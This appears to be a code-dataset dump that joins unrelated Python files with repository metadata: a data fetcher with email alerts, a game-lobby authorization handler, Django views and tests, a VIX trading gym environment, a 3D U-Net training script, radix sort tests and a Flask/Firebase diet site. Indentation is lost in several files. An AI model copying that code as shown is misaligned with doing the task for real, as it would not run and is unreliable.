self.logger.info("Moving %s into %s", path, new_path)
move_file_forcefully(path, new_path)
copy_file_list([new_path], self.DATA_DIR, self.logger)
self.tar_files.append(os.path.basename(new_path))
if self.is_validate:
self.validate_schema(new_path, file_name, self.email_recipiants)
else:
raise DigitalSmithFetchException("No files in %s" %self.channel_s3path)
def validate_schema(self, filename, s3path, email_list):
if not self.is_validate:
return
file_name = os.path.basename(filename)
schema_file = self.channel_schema_file
        self.logger.info('Validating file %s against schema %s' % (filename, schema_file))
        with open(schema_file) as schema_fp:
            json_schema = json.load(schema_fp)
error = ''
        try:
            with open(filename, 'rb') as fp:
                for line in fp:
                    line = line.decode('utf-8').strip()
                    if not line:
                        continue
                    data = json.loads(line)
                    jsonschema.validate(data, json_schema)
except jsonschema.ValidationError as e:
error = 'json schema validation error: %s' % e
except jsonschema.SchemaError as e:
error = 'json schema error: %s' % e
except ValueError as e:
error = 'invalid json data: %s' % e
if error:
self.send_error_mail(s3path, error, email_list, line)
sys.exit(error)
else:
self.send_success_mail(s3path, email_list)
def send_error_mail(self, filename, error, email_list, line):
subject = "VALIDATION FAILED FOR VERIZON FIOS CHANNEL AKA FILE"
mail_sent = False
        html = '<table border="1" style="width:100%"><tr><th>' + '</th><th>'.join(["File", "Reason", "Record"]) + '</th></tr>'
html += '<tr><td>' + '</td><td>'.join([filename, error, line]) + '</td></tr>'
body = subject + "<br><br>" + html
        for _ in range(self.sending_mail_retries):
try:
vtv_send_html_mail_2(self.logger, self.server, self.sender, email_list, subject, None, body, None)
mail_sent = True
break
except:
self.logger.info("Failed to send mail, retrying in 1 minute")
time.sleep(60)
if mail_sent:
self.logger.info("mail sent successfully")
else:
self.logger.error("Error sending mail server:%s, sender: %s, recipients: %s" % (self.server, self.sender, email_list))
def send_success_mail(self, filename, email_list):
        subject = "VALIDATION SUCCESSFUL FOR VERIZON FIOS CHANNEL AKA FILE"
mail_sent = False
        html = '<table border="1" style="width:100%"><tr><th>' + '</th><th>'.join(["File", "Status"]) + '</th></tr>'
html += '<tr><td>' + '</td><td>'.join([filename, "SUCCESS"]) + '</td></tr>'
body = subject + "<br><br>" + html
        for _ in range(self.sending_mail_retries):
try:
vtv_send_html_mail_2(self.logger, self.server, self.sender, email_list, subject, None, body, None)
mail_sent = True
break
except:
self.logger.info("Failed to send mail, retrying in 1 minute")
time.sleep(60)
if mail_sent:
self.logger.info("mail sent successfully")
else:
self.logger.error("Error sending mail server:%s, sender: %s, recipients: %s" % (self.server, self.sender, email_list))
def cleanup(self):
path_suffix_list = [('.', '%s*.log' % self.script_prefix)]
self.move_logs(self.PROCESS_DIR, path_suffix_list)
self.remove_old_dirs(self.PROCESS_DIR, self.logs_dir_prefix,
self.log_dirs_to_keep, check_for_success=False)
def set_options(self):
config_file = os.path.join(self.system_dirs.VTV_ETC_DIR, 'digitalsmith_fetcher.json')
self.parser.add_option('-c', '--config-file', default=config_file,
help='configuration file')
self.parser.add_option('-s', '--section', default='')
self.parser.add_option("--lang", default='' ,help="language data to be used")
def run_main(self):
self.download_data()
self.download_available_id_data()
if self.channel_s3path != '':
self.download_channels_data()
self.archive_data_files(
self.PROCESS_DIR, self.DATA_DIR,
self.tar_files, self.tar_file_prefix,
tgz_creation_only=True
)
if __name__ == "__main__":
vtv_task_main(DigitalSmithFetcher)
|
[
"jitendra.sahu@tivo.com"
] |
jitendra.sahu@tivo.com
|
4ea7bacca0af84e490cf55b3ba916a62c5393dbb
|
3fa480cf996c4f597013f89c31dacdbd1abde153
|
/server/lobby_server_handlers/AuthorizationHandler.py
|
fa2e4abb8eeebaca88304ec5cb6aa2161d248490
|
[] |
no_license
|
einhornus/CrazyGo
|
bdfd3700f912a616384cec1cace822e0a0604e4a
|
a7ffcd6cc75c515e93b7f9ff11ac412d5a0b7d5e
|
refs/heads/master
| 2021-01-20T04:04:43.913605
| 2017-10-05T16:20:26
| 2017-10-05T16:20:26
| 101,261,846
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,488
|
py
|
from Server import *
from utils.Validator import *
from utils.print_utils import *
from utils.db_queries import *
from utils.security import *
from lobby_server_handlers.factory_utils import *
class AuthorizationHandler(Handler):
def get_validator(self):
res = Validator(['id', 'token'])
return res
def get_type(self):
return 'authorize'
def userEntered(self, me, id):
print("New connection from " + str(id))
me.id = id
sendMessageToAllClients(me.factory, "+ "+str(me.id))
if not hasattr(me.factory, "clientProtocols"):
me.factory.clientProtocols = []
me.factory.clientProtocols.append(me)
me.sendLine("all_users "+getAllIdsString(me.factory))
if not hasattr(me.factory, 'games'):
me.factory.games = []
me.sendLine("all_games "+getAllGamesString(me.factory))
def action(self, request, factory, me):
id = request["id"]
token = request["token"]
if check_token(id, token):
if not hasattr(me.factory, "clientProtocols"):
me.factory.clientProtocols = []
            # reject a second connection with the same id, otherwise register the user
            for protocol in me.factory.clientProtocols:
                if int(id) == protocol.id:
                    me.sendLine(print_error(CONNECTION_REPEAT, ""))
                    return
            self.userEntered(me, int(id))
else:
me.sendLine(print_error(SECURITY_ERROR, ""))
|
[
"luckjanovdmitry@yandex.ru"
] |
luckjanovdmitry@yandex.ru
|
83d3d6925c21facfd3766c1e896d23ebf4bf2a33
|
902bb659e6a28a69a228a4fbd89467158a9ebeee
|
/config.py
|
c3d6508971e0eb7194c746e0aa4de628774b23f4
|
[] |
no_license
|
kylepamintuan/django-intro
|
c993b6cd8ab0b912d8c169cc2d409215ef17760f
|
9ea7a3f2f8bbe78580bf23b0ba2b1cc76e6119ec
|
refs/heads/master
| 2022-12-05T08:39:16.316536
| 2020-08-28T23:13:58
| 2020-08-28T23:13:58
| 287,610,142
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 49
|
py
|
import os
MODE = os.getenv('MODE')
# print(MODE)
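# A hedged sketch of typical usage (the 'development' fallback is an
# assumption, not something the original defines):
# MODE = os.getenv('MODE', 'development')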
|
[
"kylepamintuan@gmail.com"
] |
kylepamintuan@gmail.com
|
30660dc6c9d096d6533e3946c6211c6e681d7f76
|
434b373e1b8859a77029346f08108aa959f116ac
|
/curso/concurrente/threads/18.-pool.py
|
ba742838a5128800d13a51bf1e97d333e7c20c77
|
[] |
no_license
|
gamorales/codigo
|
144d72d52a223254bfc9249f7e9e05494857648a
|
bf75a354b5e265cf8fe70b2d497f64df026e18b2
|
refs/heads/main
| 2023-05-11T00:47:33.967454
| 2021-03-22T03:35:00
| 2021-03-22T03:35:00
| 253,639,839
| 0
| 0
| null | 2023-05-01T21:00:08
| 2020-04-06T23:33:49
|
Python
|
UTF-8
|
Python
| false
| false
| 621
|
py
|
import time
import logging
import threading
from concurrent.futures import ThreadPoolExecutor
logging.basicConfig(level=logging.DEBUG, format='%(threadName)s: %(message)s',)
def math_operation(number1, number2):
time.sleep(1)
result = number1 + number2
    logging.info(f'Result of {number1} + {number2} = {result}')
if __name__ == '__main__':
executor = ThreadPoolExecutor(max_workers=3, thread_name_prefix='facilitos')
executor.submit(math_operation, 10, 20)
executor.submit(math_operation, 40, 50)
executor.submit(math_operation, 100, 200)
executor.submit(math_operation, 60, 70)
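    # Note: with max_workers=3, the fourth submit above queues until a worker
    # frees up. A sketch of the equivalent context-manager form, which also
    # blocks until all submitted tasks finish:
    #
    # with ThreadPoolExecutor(max_workers=3, thread_name_prefix='facilitos') as ex:
    #     for a, b in [(10, 20), (40, 50), (100, 200), (60, 70)]:
    #         ex.submit(math_operation, a, b)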
|
[
"guilleccep@gmail.com"
] |
guilleccep@gmail.com
|
5ced3b2b63914733332588265f82e868e2cf0a5c
|
6f211bee3274ffea34c7910393770a3ce881f921
|
/contracts/views.py
|
6e1c6a5b4aedbbd9be265a08eb6f39ad30e01029
|
[] |
no_license
|
luizzmizz/dmart
|
7d0266c234a3a02c8ee749f81fdc5872b748cead
|
540ca77d0facaa9fdbe8aa5ad22b8cc8284665ec
|
refs/heads/master
| 2020-06-29T21:43:08.585885
| 2016-09-07T13:45:23
| 2016-09-07T13:45:23
| 67,285,137
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,428
|
py
|
from django.shortcuts import render
from datetime import datetime
# Create your views here.
from models import query
from django.http import HttpResponse
from django.template import loader
from django.db import connections
import django_tables2 as tables
import os
class mytable(tables.Table):
contract_number=tables.Column()
nuno_name=tables.Column()
active_on=tables.DateColumn()
cancel_on=tables.DateColumn()
billing_start_on=tables.DateColumn()
billing_end_on=tables.DateColumn()
state_name=tables.Column()
status_name=tables.Column()
linea_tec_name=tables.Column()
contacto_name=tables.Column()
owner_name=tables.Column()
created_on=tables.DateColumn()
merge_status=tables.Column()
last_opp_renewal=tables.DateColumn()
contract_version=tables.Column()
class Meta:
attrs = {"class": "paleblue"}
def runQuery(query, params, request):
    cursor = connections['nexus'].cursor()
    cursor.execute(query, params)
    columns = [col[0].lower() for col in cursor.description]
    resultsList = [dict(zip(columns, row)) for row in cursor.fetchall()]
    cursor.close()
    table = mytable(resultsList)
    tables.RequestConfig(request, paginate=False).configure(table)
    return HttpResponse(loader.get_template('contracts/result.html').render(
        {'result': table, 'STATIC_URL': '/static/'}, request))
def index(request):
    sdate = request.GET.get('sdate', datetime.now())
    edate = request.GET.get('edate', datetime.now())
query="""select c.contract_number,c.external_contract_number,c.nuno_name,c.fase,
c.active_on,c.expired_on-1 hey,c.cancel_on,
c.billing_start_on,c.billing_end_on,
c.state_name,c.status_name,
c.linea_tec_name,
c.contacto_name,c.owner_name,c.created_on,c.merge_status,
c.last_opp_renewal,
c.contract_version
from
uni_mscrm.contracts c
where to_number(to_char(c.expired_on-1,'yy'))>=:year
and to_number(to_char(c.active_on,'yy'))<=:year
and c.linea_tec_name in ('Sistemas','Google Enterprise Solutions') """
params={'year':sdate}
return runQuery(query,params,request)
def listqueries(request):
return HttpResponse(loader.get_template('contracts/listqueries.html').render({ 'queries': query.objects.all() }, request))
|
[
"root@srv-gestion-oracle.unitronics.es"
] |
root@srv-gestion-oracle.unitronics.es
|
bf251dd57cbd20ebd5de2318b42b699392cdd06a
|
18d221fa6a935655cf235beacbc514a221a7d57d
|
/backend/tasks/tests.py
|
c7b9d0385ffc624c4deb60742fcb10ed605bf4fd
|
[] |
no_license
|
vruya/jars
|
8ed6e47d48d4fe9f66762f0a9d88f01355c41f84
|
725380ae76e2adfcaa8d46ccae3f50e81b31244e
|
refs/heads/master
| 2023-04-25T06:25:39.272218
| 2021-05-15T09:56:41
| 2021-05-15T09:56:41
| 367,593,847
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,976
|
py
|
from django.test import TestCase
from django.urls import reverse
from rest_framework.test import APITestCase
from rest_framework import status
from tasks.serializers import TaskSerializer
from tasks.models import Task
import json
class ModelTestCase(TestCase):
def testModel(self):
task = Task(name="My Task", description="Test Case")
self.assertEqual(task.name, "My Task")
self.assertEqual(task.description, "Test Case")
self.assertTrue(task.date)
class TaskViewSetTestCase(APITestCase):
def setUp(self):
self.base_data = {
'name' : 'task #1'
}
self.url_name = 'tasks'
def create_task(self):
serializer = TaskSerializer(data=self.base_data)
serializer.is_valid(raise_exception=True)
serializer.save()
return serializer.data
def test_task_create(self):
response = self.client.post(reverse(self.url_name),json.dumps(self.base_data),content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data['name'], self.base_data['name'])
self.assertTrue(response.data['date'])
def test_task_detail(self):
self.create_task()
response = self.client.get(reverse(self.url_name))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 1)
def test_task_partial_update(self):
data = self.create_task()
to_update = {
'description' : 'desc for #1'
}
data.update(to_update)
response = self.client.patch(reverse(self.url_name, kwargs={'pk':data['id']}), json.dumps(to_update), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
self.assertEqual(response.data['description'], to_update['description'])
self.assertEqual(response.data, data)
|
[
"k4lly2@gmail.com"
] |
k4lly2@gmail.com
|
7138b968dabeeafecdd36463a212e3752ca3a438
|
90e81d270bc061e0f648c004325a0edbc109e772
|
/bookmak/apps.py
|
064189a6d5b396baa2266b0ab34716525b7624ab
|
[] |
no_license
|
nurbergen02/film
|
1439bd4e6401e65e88ac51d2f5e8e1da832fce41
|
822ca563cddd4ca4f9eac808b324d2c32ed3d867
|
refs/heads/master
| 2023-08-21T05:36:39.827526
| 2021-10-29T13:28:54
| 2021-10-29T13:28:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 146
|
py
|
from django.apps import AppConfig
class BookmakConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'bookmak'
|
[
"kanumetovnurbergen@gmail.com"
] |
kanumetovnurbergen@gmail.com
|
6ddf11a30d77ac956107f13d376e0f5945b8cf27
|
3e81fdf9bbf5d9285da50c6cadb48e87c999baf7
|
/vix/model7/trpo_large_noise/trading_vix_env.py
|
4e9c54c0eab0c259840794f538bbf52332fd49af
|
[] |
no_license
|
huazuhao/policy_gradient_cartpole
|
b665ae0f1a6180dd62a783f28498cfdbd2132ed2
|
b6f757dd787e477012231694764069a9c483c005
|
refs/heads/main
| 2023-06-17T03:19:15.511779
| 2021-07-17T05:20:24
| 2021-07-17T05:20:24
| 364,783,163
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,133
|
py
|
import gym
from gym import spaces
import pandas as pd
import numpy as np
import random
from random import randrange
from sympy.solvers import solve
from sympy import Symbol
class trading_vix_env(gym.Env):
def __init__(self):
super(trading_vix_env,self).__init__()
self.max_trajectory_length_in_days = 100
self.intervals_per_day = 7
self.max_trajectory_length = self.intervals_per_day * self.max_trajectory_length_in_days
#load data
self.index_feature_dataframe = pd.read_csv("full_feature_dataframe.csv")
#observation and action space
self.action_space = spaces.box.Box(
low=0, #no position
high=1, #all in stock
shape=(1,),
dtype=np.float32
)
high_observation = np.asarray([9999]*(self.index_feature_dataframe.shape[1]-6)) #i don't get to observe date,vixy bid/ask, spy bid/ask/mid
self.observation_space = spaces.box.Box(
low=-1*high_observation,
high=high_observation,
dtype=np.float32
)
#other variables
self.current_time_index = None
self.quantity = None #how many vixy shares i own
self.cash = None
self.min_transaction_value = None
self.buy_and_hold_stock_quantity = None
self.current_portfolio_value = None
self.current_trajectory_length = None
self.has_at_least_one_sell = None
def seed(self, seed=None):
np.random.seed(seed)
random.seed(seed)
def reset(self):
#pick a random starting point on the self.index_feature_dataframe
self.current_time_index = randrange(0,self.index_feature_dataframe.shape[0]-self.max_trajectory_length-50) #for some safety margin
observation = self.index_feature_dataframe.iloc[self.current_time_index][2:25].to_numpy()
observation = observation.reshape((-1,1))
current_vixy_sell_price = self.index_feature_dataframe.iloc[self.current_time_index][25] #sell price or bid price
current_vixy_buy_price = self.index_feature_dataframe.iloc[self.current_time_index][26] #buy price or ask price
returned_observation = np.concatenate((observation,[[0]]),axis = 0) #[[0]] because I start off with 0 in vix
#initialize other variables
self.quantity = 0
self.cash = 1e4
self.min_transaction_value = 5e2
self.buy_and_hold_stock_quantity = self.cash/current_vixy_buy_price
value_in_stock = self.quantity*current_vixy_sell_price
self.current_portfolio_value = self.cash + value_in_stock
self.current_trajectory_length = 0
self.has_at_least_one_sell = False
return np.reshape(returned_observation,(-1,))
def step(self,action):
action = np.clip(action, 0, 1)[0]
        if self.current_portfolio_value is None:
raise Exception("Please call reset first")
execute_sell = False
execute_buy = False
current_vixy_sell_price = self.index_feature_dataframe.iloc[self.current_time_index][25] #sell price or bid price
current_vixy_buy_price = self.index_feature_dataframe.iloc[self.current_time_index][26] #buy price or ask price
value_in_stock = self.quantity*current_vixy_sell_price
current_percent_value_in_stock = value_in_stock/self.current_portfolio_value
if current_percent_value_in_stock<action:
need_to_buy = True
need_to_sell = False
else:
need_to_buy = False
need_to_sell = True
average_future_price = self.index_feature_dataframe.iloc[self.current_time_index:self.current_time_index+30]
average_future_price = np.mean(average_future_price['vixy_bid_close'])
sell_price_diff_of_new_minus_future = current_vixy_sell_price - average_future_price
if need_to_buy:
x = Symbol('x')
r = solve((value_in_stock+x)/(value_in_stock+x+self.cash-x) - action,x)
r = float(r[0])
if r>self.min_transaction_value:
if r > self.cash:
r = self.cash #cannot buy more than cash
self.cash -= r
bought_quantity = r/current_vixy_buy_price
self.quantity += bought_quantity
execute_buy = True
if need_to_sell:
x = Symbol('x')
r = solve((value_in_stock-x)/(value_in_stock-x+self.cash+x) - action,x)
r = float(r[0])
if r>self.min_transaction_value:
sold_quantity = r/current_vixy_sell_price
if sold_quantity > self.quantity:
sold_quantity = self.quantity
self.quantity -= sold_quantity
self.cash += sold_quantity*current_vixy_sell_price
execute_sell = True
if self.has_at_least_one_sell == False:
self.has_at_least_one_sell = True
self.current_time_index += 1
self.current_trajectory_length += 1
current_vixy_sell_price = self.index_feature_dataframe.iloc[self.current_time_index][25] #sell price or bid price
current_vixy_buy_price = self.index_feature_dataframe.iloc[self.current_time_index][26] #buy price or ask price
value_in_stock = self.quantity*current_vixy_sell_price
self.current_portfolio_value = self.cash + value_in_stock
current_percent_value_in_stock = value_in_stock/self.current_portfolio_value
observation = self.index_feature_dataframe.iloc[self.current_time_index][2:25].to_numpy()
observation = observation.reshape((-1,1))
observation = np.concatenate((observation,[[current_percent_value_in_stock]]),axis = 0)
reward = 0
#when I buy and the stock subsequently rises, then I get a positive reward.
if execute_buy:
reward = sell_price_diff_of_new_minus_future*-1*10
#when I sell and the stock subsequently falls, then I get a positive reward
if execute_sell:
reward = sell_price_diff_of_new_minus_future*10
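        # NOTE: the unconditional reset below discards the shaping rewards
        # computed above, so only the terminal reward paid at the end of the
        # trajectory is ever returned.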
reward = 0
info = {}
info['current_portfolio'] = self.current_portfolio_value
info['execute_buy'] = execute_buy
info['execute_sell'] = execute_sell
info['current_vix_sell_price'] = current_vixy_sell_price
if self.current_trajectory_length == self.max_trajectory_length:
#the end of this trajectory
done = True
reward = (self.current_portfolio_value/current_vixy_sell_price)-self.buy_and_hold_stock_quantity
returned_observation = np.reshape(observation,(-1,))
print('the reward is',reward)
if self.has_at_least_one_sell == False:
reward = 0
return returned_observation, reward, done, info
done = False
returned_observation = np.reshape(observation,(-1,))
return returned_observation, reward, done, info
def render(self):
pass
def close(self):
pass
|
[
"huazuhao@bitbucket.org"
] |
huazuhao@bitbucket.org
|
9f7b36625f5209f81f3d023fd00f642f97177a60
|
0369374279fb5b2eaf2b87aebbacd9da0bdd5861
|
/nb_pl_args.py
|
03fe87f8fca7c45eca56fecfb2210696e6f72b1f
|
[
"MIT"
] |
permissive
|
icrdr/3D-UNet-Renal-Anatomy-Extraction
|
56f93cfddb9fa42e8acfc75c4ad0ce131812138f
|
50b16151730ec7868b3d3482e4db31e4c1e25412
|
refs/heads/master
| 2022-11-24T14:44:48.501264
| 2020-07-25T08:21:43
| 2020-07-25T08:21:43
| 282,401,698
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,547
|
py
|
# %%
from tqdm import tqdm, trange
from visualize import grid_plt, sample_plt
from data import CaseDataset
from trainer import DatasetFromSubset, Trainer, predict_3d_tile
from network import generate_paired_features, Unet, ResBlock, ResBlockStack
from loss import DiceCoef, FocalDiceCoefLoss, dice_coef
from torchvision.transforms import Compose
from transform import Crop, resize, rescale, to_one_hot, RandomCrop, ToOnehot, ToNumpy, ToTensor, \
CombineLabels, RandomBrightness, RandomContrast, RandomGamma, RandomRescale, RandomRescaleCrop, \
RandomMirror, pad, crop_pad, to_tensor, to_numpy
import torch
import torch.nn as nn
import torch.optim as optim
from pytorch_lightning.loggers import TensorBoardLogger
from pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping
from pytorch_lightning import Trainer, LightningModule
from datetime import datetime
from argparse import Namespace, ArgumentParser
parser = ArgumentParser()
parser.add_argument('-data', type=str,
                    default='data/Task00_Kidney/normalized',
                    dest='data_set_dir',
                    help='dataset directory')
parser.add_argument('-lr', type=float,
                    default=1e-4,
                    dest='learning_rate',
                    help='learning rate')
parser.add_argument('-pool', type=int,
                    default=4,
                    dest='num_pool',
                    help='number of pooling levels')
parser.add_argument('-feature', type=int,
                    default=30,
                    dest='num_features',
                    help='base number of feature channels')
parser.add_argument('-patch-x', type=int,
                    default=160,
                    dest='patch_x',
                    help='patch size along x')
parser.add_argument('-patch-y', type=int,
                    default=160,
                    dest='patch_y',
                    help='patch size along y')
parser.add_argument('-patch-z', type=int,
                    default=80,
                    dest='patch_z',
                    help='patch size along z')
parser.add_argument('-split', type=float,
                    default=0.2,
                    dest='valid_split',
                    help='validation split fraction')
parser.add_argument('-batch', type=int,
                    default=1,
                    dest='batch_size',
                    help='batch size')
parser.add_argument('-worker', type=int,
                    default=2,
                    dest='num_workers',
                    help='number of dataloader workers')
parser.add_argument('-resume', type=str,
                    default='',
                    dest='resume_ckpt',
                    help='checkpoint to resume training from')
parser.add_argument('-save', type=str,
                    default='',
                    dest='save_path',
                    help='default save path for logs and checkpoints')
args = parser.parse_args()
print(args)
class Unet3D(LightningModule):
def __init__(self, hparams):
super(Unet3D, self).__init__()
self.hparams = hparams
self.learning_rate = hparams.learning_rate
self.data_set_dir = hparams.data_set_dir
self.loader_kwargs = {'batch_size': hparams.batch_size,
'num_workers': hparams.num_workers,
'pin_memory': True}
self.valid_split = hparams.valid_split
num_pool = hparams.num_pool
num_features = hparams.num_features
patch_size = (hparams.patch_x,
hparams.patch_y,
hparams.patch_z)
def encode_kwargs_fn(level):
num_stacks = max(level, 1)
return {'num_stacks': num_stacks}
paired_features = generate_paired_features(num_pool, num_features)
self.net = Unet(in_channels=1,
out_channels=1,
paired_features=paired_features,
pool_block=ResBlock,
pool_kwargs={'stride': 2},
up_kwargs={'attention': True},
encode_block=ResBlockStack,
encode_kwargs_fn=encode_kwargs_fn,
decode_block=ResBlock)
self.loss = FocalDiceCoefLoss()
self.tr_transform = Compose([
RandomRescaleCrop(0.1,
patch_size,
crop_mode='random',
enforce_label_indices=[1]),
RandomMirror((0.2, 0, 0)),
RandomContrast(0.1),
RandomBrightness(0.1),
RandomGamma(0.1),
CombineLabels([1, 2], 3),
ToTensor()
])
self.vd_transform = Compose([
RandomCrop(patch_size),
CombineLabels([1, 2], 3),
ToTensor()
])
def prepare_data(self):
data_set = CaseDataset(self.data_set_dir)
n_valid = round(len(data_set) * self.valid_split)
valid_subset, train_subset = torch.utils.data.random_split(
data_set, [n_valid, len(data_set)-n_valid])
self.train_set = DatasetFromSubset(train_subset, self.tr_transform)
self.valid_set = DatasetFromSubset(valid_subset, self.vd_transform)
def forward(self, x):
return self.net(x)
def configure_optimizers(self):
return optim.Adam(self.parameters(), lr=self.learning_rate)
def training_step(self, batch, batch_idx):
input, target = batch['image'], batch['label']
output = self.forward(input)
loss = self.loss(output, target)
logs = {'loss': loss}
return {'loss': loss, 'log': logs}
def validation_step(self, batch, batch_idx):
input, target = batch['image'], batch['label']
output = self.forward(input)
loss = self.loss(output, target)
return {'val_loss': loss}
def validation_epoch_end(self, outputs):
val_loss_mean = torch.stack([x['val_loss'] for x in outputs]).mean()
return {'val_loss': val_loss_mean}
def train_dataloader(self):
return torch.utils.data.DataLoader(self.train_set,
shuffle=True,
**self.loader_kwargs)
def val_dataloader(self):
return torch.utils.data.DataLoader(self.valid_set,
**self.loader_kwargs)
model = Unet3D(hparams=args)
# %%
# version = datetime.now().strftime("%y%m%d%H%H%M%S")
# logger = TensorBoardLogger('logs', name='Task00_Kidney_00', version=version)
# checkpoint = ModelCheckpoint('logs/Task00_Kidney_00/%s' % version)
# early_stop = EarlyStopping(patience=100, min_delta=1e-3)
# 'logs/Task00_Kidney_00/lightning_logs/version_0/checkpoints/epoch=7.ckpt'
# 'logs/Task00_Kidney_00/'
resume_ckpt = args.resume_ckpt if args.resume_ckpt else None
save_path = args.save_path if args.save_path else None
trainer = Trainer(gpus=1,
amp_level='O2',
precision=16,
progress_bar_refresh_rate=1,
train_percent_check=1,
max_epochs=500,
min_epochs=100,
# logger=logger,
# checkpoint_callback=checkpoint,
# early_stop_callback=early_stop,
default_save_path=save_path,
resume_from_checkpoint=resume_ckpt
)
trainer.fit(model)
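# Example invocation (paths are placeholders, not from the original repo):
#   python nb_pl_args.py -data data/Task00_Kidney/normalized -batch 1 -worker 2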
|
[
"icrdr2010@outlook.com"
] |
icrdr2010@outlook.com
|
c1b101f8914fcc60583cb2f36b6db89aa4e3aa9b
|
741ee09b8b73187fab06ecc1f07f46a6ba77e85c
|
/AutonomousSourceCode/data/raw/sort/057d98c9-3f90-4dd0-ab4a-c70c73015106__test_radix_sort.py
|
e703ae7b2fa212cae8724089524582c5ab5b833d
|
[] |
no_license
|
erickmiller/AutomatousSourceCode
|
fbe8c8fbf215430a87a8e80d0479eb9c8807accb
|
44ee2fb9ac970acf7389e5da35b930d076f2c530
|
refs/heads/master
| 2021-05-24T01:12:53.154621
| 2020-11-20T23:50:11
| 2020-11-20T23:50:11
| 60,889,742
| 6
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 734
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import pytest
from structures.radix_sort import radix_sort
@pytest.fixture
def sorted_list():
    return list(range(10))
@pytest.fixture
def equal_values_list():
return [5, 9, 4, 2, 5, 0, 5, 2, 6, 4]
@pytest.fixture
def random_list():
return [5, 9, 2, 4, 1, 6, 8, 7, 0, 3]
def test_sorted(sorted_list):
radix_sort(sorted_list)
assert sorted_list == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
def test_average(random_list):
radix_sort(random_list)
assert random_list == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
def test_equal_values(equal_values_list):
radix_sort(equal_values_list)
assert equal_values_list == [0, 2, 2, 4, 4, 5, 5, 5, 6, 9]
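# For reference, a minimal in-place LSD radix sort sketch that satisfies these
# tests (the real implementation lives in structures/radix_sort.py; this is an
# assumption about its behaviour, not a copy of it):
#
# def radix_sort(values):
#     if not values:
#         return
#     digits = len(str(max(values)))
#     for d in range(digits):
#         buckets = [[] for _ in range(10)]
#         for v in values:
#             buckets[(v // 10 ** d) % 10].append(v)
#         values[:] = [v for bucket in buckets for v in bucket]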
|
[
"erickmiller@gmail.com"
] |
erickmiller@gmail.com
|
b360b784071501c6a5cd07ded434bf7588c9598d
|
d32c5f7c5f09d890f64f03a7ad16887a32db8bfa
|
/iDiet.py
|
91d400e4405850b772c62b384eef376d68538bb8
|
[] |
no_license
|
CherryPhil/Share-Files
|
33b8ed132f08eff8fd17ec058bf4f12ad7c9227b
|
8e4082b43885297d3840c5926620c33748fe98b4
|
refs/heads/master
| 2021-05-12T19:39:22.909649
| 2018-02-05T13:05:47
| 2018-02-05T13:05:47
| 117,099,483
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,563
|
py
|
from flask import Flask, render_template, request, redirect, url_for, jsonify, session
#Firebase
import firebase_admin
from firebase_admin import credentials, db
from formLogin import LoginForm
from formRegister import RegisterForm
from formProfile import ProfileForm
from postVar import Post
from postVar import Contact
from postVar import User_recipe
from postVar import Announcement
from getPost import postObj
from getPost import contactObj
from getPost import recipeObj
from getPost import announcementsObj
from objRegister import RegisterObject
cred = credentials.Certificate('cred/idiet-229a2-firebase-adminsdk-f5ibn-9f138ec335.json')
default_app = firebase_admin.initialize_app(cred, {
'databaseURL': 'https://idiet-229a2.firebaseio.com/'
})
root = db.reference()
app = Flask(__name__)
#HOME
@app.route("/")
def home():
home_recipe = []
recipes = []
getRecipe = root.child("recipe").get()
for i in getRecipe:
recipeDetail = getRecipe[i]
recipes.append(recipeDetail["likes"])
recipes.sort(key=int, reverse=True)
for iterate in getRecipe:
numberOfLikes = getRecipe[iterate]["likes"]
if numberOfLikes == recipes[0]:
home_recipe.append(getRecipe[iterate])
for iterate in getRecipe:
numberOfLikes = getRecipe[iterate]["likes"]
if numberOfLikes == recipes[1]:
home_recipe.append(getRecipe[iterate])
try:
userId = session["logged_in"]
except KeyError:
return render_template("home.html", list=home_recipe)
users = root.child("users/" + userId).get()
return render_template("home.html", list=home_recipe, user=users)
@app.route('/home/home_health', methods=['POST', 'GET'])
def home_health():
articles = root.child("articles/health").get()
try:
adminID = session["logged_in_admin"]
except KeyError:
try:
userId = session["logged_in"]
except KeyError:
return render_template("home_health.html", articles=articles)
users = root.child("users/" + userId).get()
return render_template("home_health.html", user=users, articles=articles)
adminData = root.child("admins/" + adminID).get()
return render_template('home_health.html', admin=adminData, articles=articles)
@app.route('/home/home_family', methods=['POST', 'GET'])
def home_family():
try:
adminID = session["logged_in_admin"]
except KeyError:
try:
userId = session["logged_in"]
except KeyError:
return render_template("home_family.html")
users = root.child("users/" + userId).get()
return render_template("home_family.html", user=users)
adminData = root.child("admins/" + adminID).get()
return render_template('home_family.html', admin=adminData)
@app.route('/home/home_travel', methods=['POST', 'GET'])
def home_travel():
try:
adminID = session["logged_in_admin"]
except KeyError:
try:
userId = session["logged_in"]
except KeyError:
return render_template("home_travel.html")
users = root.child("users/" + userId).get()
return render_template("home_travel.html", user=users)
adminData = root.child("admins/" + adminID).get()
return render_template('home_travel.html', admin=adminData)
@app.route('/home/home_food', methods=['POST', 'GET'])
def home_food():
try:
adminID = session["logged_in_admin"]
except KeyError:
try:
userId = session["logged_in"]
except KeyError:
return render_template("home_food.html")
users = root.child("users/" + userId).get()
return render_template("home_food.html", user=users)
adminData = root.child("admins/" + adminID).get()
return render_template('home_food.html', admin=adminData)
@app.route("/articleUpdate")
def articleUpdate():
header = request.args.get("header")
content = request.args.get("content")
direct = request.args.get("direct")
articles = root.child("articles/" + direct)
articles.update({
"content": content,
"header": header
})
return jsonify()
#RECIPE (Ernest)
@app.route('/recipe')
def Recipe():
database_recipes = root.child('recipe').get()
name = []
for i in database_recipes:
recipe_detail = database_recipes[i]
